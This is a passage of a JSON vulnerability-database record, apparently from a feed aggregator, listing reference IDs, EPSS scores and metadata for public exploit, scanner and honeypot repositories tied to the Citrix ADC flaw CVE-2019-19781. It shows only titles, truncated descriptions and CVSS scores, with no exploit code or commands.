"OPENVAS:1361412562310876320", "OPENVAS:1361412562310891325"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147181", "PACKETSTORM:147182", "PACKETSTORM:147247", "PACKETSTORM:147392", "PACKETSTORM:153133", "PACKETSTORM:154176", "PACKETSTORM:154579"]}, {"type": "ptsecurity", "idList": ["PT-2020-01"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:563DC556FF331059CAC2F71B19B341B5", "QUALYSBLOG:D57DEDE8164E21BF8EE0C81B50AAA328", "QUALYSBLOG:D8942BC5A4E89874A6FC2A8F7F74D3F1", "QUALYSBLOG:FBDC4B445E6B33502BA1650A8BD4A6E1"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7549D87CE6E6AE596B8031184231ECD1"]}, {"type": "saint", "idList": ["SAINT:420D07B85504086850EFAA31B8BCAEB5", "SAINT:C857C9B9FEF5E0F807DAAB797C3B2D87", "SAINT:E218D6FA073276BB012BADF2CCE50F0E"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "seebug", "idList": ["SSV:97207"]}, {"type": "symantec", "idList": ["SMNTC-111238"]}, {"type": "talosblog", "idList": ["TALOSBLOG:2401133934B407D6B7E1C6D91E886EBA", "TALOSBLOG:25506C78BB084870681BE9F9E1357045", "TALOSBLOG:30A0CC27D6C35FC08DF198CA0AA9C626", "TALOSBLOG:5757EE09BE22E4808719C348402D3F43", "TALOSBLOG:71D138211697B43CB345A133B54BC824", "TALOSBLOG:97F975C073505AE88655FF1C539740A6", "TALOSBLOG:A56CDCC440F2E308EB75E66C6F9521B8", "TALOSBLOG:AB5E63755953149993334997F5123794", "TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "TALOSBLOG:F5BDBD830CCBBD67980916B9F246B878"]}, {"type": "thn", "idList": ["THN:1BA2E3EE721856ECEE43B825656909B0", "THN:3D0ED27488E8AFC91D99882663F7E35A", "THN:42A0EFDB5165477E18333E9EE1A81D8E", "THN:46994B7A671ED65AD9975F25F514C6E3", "THN:65DE53134A31AE62D9634C0B4AA4E81B", "THN:8D76D821D51DF9AAAAF1C9D1FA8CA0C5", "THN:8E5D44939B2B2FF0156F7FF2D4802857", "THN:B0F0C0035DAAFA1EC62F15464A80677E", "THN:F03064A70C65D9BD62A8F5898BA276D2", "THN:F8EDB5227B5DA0E4B49064C2972A193D"]}, {"type": "threatpost", "idList": 
["THREATPOST:0D8008A1EF72C3A6059283D0D896B819", "THREATPOST:157F244C629A1657480AFA561FF77BE4", "THREATPOST:1A7A6E9FF0F2A41A6A83EBDE0038383C", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:26EF81FADB8E1A92908C782EBBDB8C88", "THREATPOST:3D545239C6AE58821904FBF3069CB365", "THREATPOST:472451689B2FA39FCB837D08B514FF91", "THREATPOST:4D733D952DD37D57DDA47C16AEAAE1FA", "THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "THREATPOST:85363E24CAB31CC66B298BC023E9CF95", "THREATPOST:88071AD0B76A2548D98F733D0DD3FE1A", "THREATPOST:937A7A291D84404C800DF20ADBE20BC1", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:BDEA819E4532E0D1FA016778F659F7E8", "THREATPOST:E1CCA676B9815B84D887370ABFDEE020"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:342FB0D457FCA0DA93C711A150B5CAE2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-7600"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:115E09DAC149F2CA9466BA7550E0A5FE"]}, {"type": "zdi", "idList": ["ZDI-19-181"]}, {"type": "zdt", "idList": ["1337DAY-ID-30171", "1337DAY-ID-30199", "1337DAY-ID-30200", "1337DAY-ID-30268", "1337DAY-ID-32826"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2018-7600", "epss": "0.975790000", "percentile": "0.999980000", "modified": "2023-03-15"}, {"cve": "CVE-2019-0604", "epss": "0.974900000", "percentile": "0.999440000", "modified": "2023-03-16"}, {"cve": "CVE-2019-0708", "epss": "0.975180000", "percentile": "0.999690000", "modified": "2023-03-15"}, {"cve": "CVE-2019-11510", "epss": "0.975040000", "percentile": "0.999580000", "modified": "2023-03-15"}, {"cve": "CVE-2019-19781", "epss": "0.975420000", "percentile": "0.999870000", "modified": "2023-03-15"}], "vulnersScore": 1.1}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660004461, "score": 1659984668, "epss": 
1679000794}, "_internal": {"score_hash": "de4bf38a326add20172775a2a9197444"}}
{"githubexploit": [{"lastseen": "2022-03-06T10:03:57", "description": "# check-your-pulse #\n\n[ Honeypot\n- Detects and logs payloads fo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-22T13:00:18", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-05-11T04:52:56", "id": "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-24T16:52:14", "description": "# CVE-2019-19781\n\nThis was only uploaded due to other researcher...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, 
"published": "2020-01-11T00:08:27", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-06-24T03:52:03", "id": "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:28:51", "description": "# citrix.sh\nCVE-2019-19781...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-20T15:30:30", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-07-19T01:10:14", "id": "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:28:55", "description": "# citrix_dir_traversal_rce\n\nA directory traversal was discovered...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-13T14:07:15", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-04-05T04:22:21", "id": "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-22T13:39:34", "description": "# CVE-2019-19781\nRemote Code Execution Exploit for Citrix Applic...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 
"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-10T22:56:35", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-22T11:43:10", "id": "5DD13827-3FCE-5166-806D-088441D41514", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-16T21:34:51", "description": "# CVE-2019-19781 citrixmash scanner\n\nA multithreaded scanner for...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-12T15:16:54", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-06-16T20:16:19", "id": "39093366-D071-5898-A67D-A99B956B6E73", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:28:58", "description": "# CVE-2019-19781\nCVE-2019-19781 Attack Triage Script\n\nThe script...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-17T16:14:30", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-21T16:48:21", "id": "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, 
"privateArea": 1}, {"lastseen": "2021-12-10T14:29:04", "description": "# Detect-CVE-2019-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-16T10:09:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-16T10:35:07", "id": "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:08", "description": "# CVE-2019-19781_IOCs\nIOCs for CVE-2019-19781\n\ncitrixhoneypotnsl...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-15T19:32:14", "type": 
"githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-15T19:37:59", "id": "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-27T21:29:49", "description": "# Honepot for CVE-2019-19781 (Citrix ADC)\nDetect and log CVE-201...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-13T10:09:31", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-27T07:11:27", "id": "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:12", "description": "# CVE-2019-19781-Checker\nCheck your website for CVE-2019-19781 V...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-15T10:15:11", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-15T10:20:33", "id": "721C46F4-C390-5D23-B358-3D4B22959428", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:18", "description": "# CVE-2019-19781\r\nAutomated script for Citrix ADC scanner ([CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 
"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-13T07:42:27", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-02-26T19:27:56", "id": "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-21T04:32:15", "description": "# CVE-2019-19781 Citrix ADC Remote Code Execution\n\n- Citrix Applica...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-09T05:17:07", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-07-09T05:17:29", "id": "0829A67E-3C24-5D54-B681-A7F72848F524", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:34:32", "description": "# CVE-2019-19781...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-09T14:26:02", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-07-09T14:30:49", "id": "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": 
"2022-08-16T08:55:18", "description": "# CVE-2019-19781\n\nRemote Code Execution (RCE) in Citrix Applicat...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-11T09:49:17", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-08-16T08:03:32", "id": "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:41:05", "description": "# Ctirix_RCE-CVE-2019-19781\nCitrix ADC RCE cve-2019-19781\n\n### [...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": 
"2021-08-29T05:22:47", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-12-06T19:08:34", "id": "2C33B9C6-636A-5907-8CD2-119F9B69B89B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-02T11:58:22", "description": "# Indicator of Compromise Scanner for CVE-2019-19781\n\nThis repos...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 